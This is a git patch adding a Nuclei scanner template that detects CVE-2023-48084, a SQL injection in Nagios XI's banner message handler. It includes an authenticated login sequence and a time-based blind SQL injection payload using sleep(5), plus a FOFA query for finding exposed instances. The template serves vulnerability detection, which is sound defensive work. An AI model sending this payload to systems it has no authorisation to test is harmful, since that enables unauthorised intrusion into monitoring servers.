From a16b4473ea6491716bebfd163be2c01e8af5b780 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 10:16:59 +0530 Subject: [PATCH] Create CVE-2023-48084.yaml --- http/cves/2023/CVE-2023-48084.yaml | 70 ++++++++++++++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 http/cves/2023/CVE-2023-48084.yaml diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml new file mode 100644 index 0000000000..5c4c293207 --- /dev/null +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -0,0 +1,70 @@ +id: CVE-2023-48084 + +info: + name: Nagios XI < 5.11.3 - SQL Injection + author: ritikchaddha + severity: critical + description: | + SQL injection vulnerability in Nagios XI before version 5.11.3 via the bulk modification tool. + impact: | + Successful exploitation could lead to unauthorized access to sensitive information. + remediation: | + Apply the vendor-supplied patch or upgrade to a non-vulnerable version. + reference: + - https://github.com/bucketcat/CVE-2023-48084 + - https://github.com/Hamibubu/CVE-2023-48084 + - https://nvd.nist.gov/vuln/detail/CVE-2023-48084 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-48084 + cwe-id: CWE-89 + epss-score: 0.00114 + epss-percentile: 0.44333 + cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + verified: true + vendor: nagios + product: nagios_xi + fofa-query: title="Nagios XI" + tags: cve,cve2023,nagiosxi,sqli,authenticated + +http: + - raw: + - | + GET /nagiosxi/login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /nagiosxi/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + nsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton= + + - | + @timeout: 15s + GET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + + skip-variables-check: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration_3>=5' + - 'contains(body_3, "Home Dashboard")' + condition: and + + extractors: + - type: regex + name: nsp + part: body + group: 1 + regex: + - 'name="nsp" value="(.*)">' + internal: true